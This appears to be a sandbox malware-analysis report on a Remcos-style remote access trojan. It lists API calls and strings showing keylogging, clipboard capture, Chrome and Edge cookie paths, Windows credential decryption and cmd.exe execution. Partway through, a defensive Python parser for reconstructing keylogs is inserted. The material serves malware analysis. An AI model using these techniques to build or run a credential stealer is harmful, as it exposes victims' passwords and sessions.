                                                                                                • API String ID: 2506810119-760905667
                                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                • API String ID: 368326130-3944316004
                                                                                                • Opcode ID: 2c1cea0d9a4bdc8569204e9d989fb37bac3133a136c475b647ab692b9f678ada
                                                                                                • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                • Opcode Fuzzy Hash: 2c1cea0d9a4bdc8569204e9d989fb37bac3133a136c475b647ab692b9f678ada
                                                                                                • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                APIs
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                • API String ID: 1881088180-2322839566
                                                                                                • Opcode ID: c61068d21ac032f18215751772468f7d7b44ffa9b06701de1bf585ad00b0d9f6
                                                                                                • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                • Opcode Fuzzy Hash: c61068d21ac032f18215751772468f7d7b44ffa9b06701de1bf585ad00b0d9f6
                                                                                                • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                                                                                APIs
                                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                APIs
                                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                Strings
                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                • API String ID: 1174141254-1980882731
                                                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                • API String ID: 1497725170-1359877963
                                                                                                • Opcode ID: e4e80c38991401544eba045930c100d15cf6e97299938fe7d3766f164e501aec
                                                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                • Opcode Fuzzy Hash: e4e80c38991401544eba045930c100d15cf6e97299938fe7d3766f164e501aec
                                                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
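The keylogger-related blocks above give away most of the offline log layout: the clipboard markers `[Text copied to clipboard]` / `[End of clipboard]` (function at 0040B7D2), the wsprintfW format `[%04i/%02i/%02i %02i:%02i:%02i ` followed by `]` (0040B22E; the `$` in the String ID field is the report's separator between two strings), and the `Online Keylogger Started` marker written when the three logging threads are created. The parser below is an added example for reconstructing such a log during incident response; it is not part of the Joe Sandbox report and not Remcos code. What the malware writes between the timestamp and the closing bracket is not shown on this page, so it is treated as a free-text label (assumption, conventionally the foreground window title), and the sample log is constructed.

```python
"""Parse a keylog in the layout implied by the report's strings (added example, not Remcos code)."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import List, Optional

# Built from the wsprintfW format "[%04i/%02i/%02i %02i:%02i:%02i " + "]".
# The free text between the timestamp and "]" is an assumption; the report
# does not show what the malware writes there.
HEADER_RE = re.compile(r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*)\]$")
CLIP_START = "[Text copied to clipboard]"
CLIP_END = "[End of clipboard]"
KEYLOGGER_STARTED = "Online Keylogger Started"


@dataclass
class Entry:
    when: datetime
    label: str                      # text after the timestamp (assumed: window title)
    keys: List[str] = field(default_factory=list)
    clipboard: List[str] = field(default_factory=list)


def parse_keylog(text: str) -> List[Entry]:
    """Group logged lines under their timestamped header; keep clipboard captures separate."""
    entries: List[Entry] = []
    current: Optional[Entry] = None
    clip_buf: Optional[List[str]] = None    # not None while inside a clipboard block
    for line in text.splitlines():
        if clip_buf is not None:
            if line == CLIP_END:
                if current is not None:
                    current.clipboard.append("\n".join(clip_buf))
                clip_buf = None
            else:
                clip_buf.append(line)
            continue
        if line == CLIP_START:
            clip_buf = []
            continue
        m = HEADER_RE.match(line)
        if m:
            when: Optional[datetime]
            try:
                when = datetime(*(int(g) for g in m.groups()[:6]))
            except ValueError:          # header-shaped line with an impossible date: not a header
                when = None
            if when is not None:
                current = Entry(when, m.group(7))
                entries.append(current)
                continue
        if not line or line == KEYLOGGER_STARTED:
            continue
        if current is not None:
            current.keys.append(line)
    if clip_buf is not None and current is not None:   # log cut off inside a clipboard block
        current.clipboard.append("\n".join(clip_buf))
    return entries


def timeline(entries: List[Entry]) -> List[str]:
    """One summary line per header, in the order the log recorded them."""
    return [
        f"{e.when:%Y-%m-%d %H:%M:%S} | {e.label} | keys={len(e.keys)} clipboard={len(e.clipboard)}"
        for e in entries
    ]


# Constructed sample in the layout described above; not a real capture.
SAMPLE_LOG = """Online Keylogger Started
[2024/10/28 14:02:07 Untitled - Notepad]
hello world
[Text copied to clipboard]
P@ssw0rd!
[End of clipboard]
[2024/10/28 14:03:15 Sign in - Google Chrome]
user@example.com
hunter2
"""

if __name__ == "__main__":
    for row in timeline(parse_keylog(SAMPLE_LOG)):
        print(row)
```

Clipboard captures are kept apart from keystrokes on purpose: a pasted password shows up only in the clipboard block, and a log that was truncated mid-block (the host was imaged while the clipboard thread was writing) still yields what was captured so far.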
APIs
• LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
• GetProcAddress.KERNEL32(00000000), ref: 00406AC4
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: CryptUnprotectData$crypt32
• API String ID: 2574300362-2380590389
• Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
• Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
• Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
• Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
• CloseHandle.KERNEL32(?), ref: 004051CA
• SetEvent.KERNEL32(?), ref: 004051D9
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
• Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
• Opcode Fuzzy Hash: 84b80ad7d3cdc11d311d6a55cfd00aa66ecc2c725afd842c636cda6babbb0f1b
• Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
• Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
• Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
• Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
• Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
• Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
• Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                                                • String ID: !D@
                                                                                                • API String ID: 3446828153-604454484
                                                                                                • Opcode ID: 497e490943b2111c41ddb6726af41986e5b3084aa378fe07644eb31d01a5d06b
                                                                                                • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                                                                                • Opcode Fuzzy Hash: 497e490943b2111c41ddb6726af41986e5b3084aa378fe07644eb31d01a5d06b
                                                                                                • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                                                                                • UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                • Instruction ID: dd969ba971dbaa29921178884ad428293cf5128bfb63f122c38d39e9abecacc1
                                                                                                • Opcode Fuzzy Hash: 614bc808d894a367532beb2bc66ad03cac91d94fb46ece2cb469b05dff719b88
                                                                                                • Instruction Fuzzy Hash: 3EB09B74541740FB8F102B745D4D5153525A604703B100475F041D6151D7B584009A1E
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                • Instruction ID: c0691e7ba4e037ba5be4177d0f13c81de84985c40ff74287bb3597843e96be7a
                                                                                                • Opcode Fuzzy Hash: 18b660a6896881f55a37715fd795c0b5131e5868884107d4762215e755f28e2f
                                                                                                • Instruction Fuzzy Hash: 5FB092B8580340FBCB002BA0AD4E91E3A64AA18703B1008ABF041D21A1EBB888009F2F
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F60), ref: 00404DB3
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474F08,00000000,00000000), ref: 00404DC7
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                                                • Opcode Fuzzy Hash: 98051303979d36a8a23a627160a2524b31ad8a85d3850f5550fb2e4a72bacabe
                                                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
                                                                                                • Opcode ID: b8bb5320799edddb95dab3e78f0dfafcdfd18fcc362c96300ca81892c57281c1
                                                                                                • Instruction ID: a79ddf3c6a5b8d59d799e992b07df0540e48cd861b142758bc1ef4dabba95ae9
                                                                                                • Opcode Fuzzy Hash: b8bb5320799edddb95dab3e78f0dfafcdfd18fcc362c96300ca81892c57281c1
                                                                                                • Instruction Fuzzy Hash: F631A904648381EDD6116BF514967AB7B824E53744F0886BFB8C8273C3DABA4808C75F
                                                                                                APIs
                                                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                                  • Part of subcall function 00413733: RegCloseKey.KERNELBASE(00000000), ref: 00413773
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQuerySleepValue
                                                                                                • String ID: HSG$exepath$RG
                                                                                                • API String ID: 4119054056-4111122955
                                                                                                • Opcode ID: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                                                                                • Opcode Fuzzy Hash: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
                                                                                                • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                                                                                APIs
                                                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
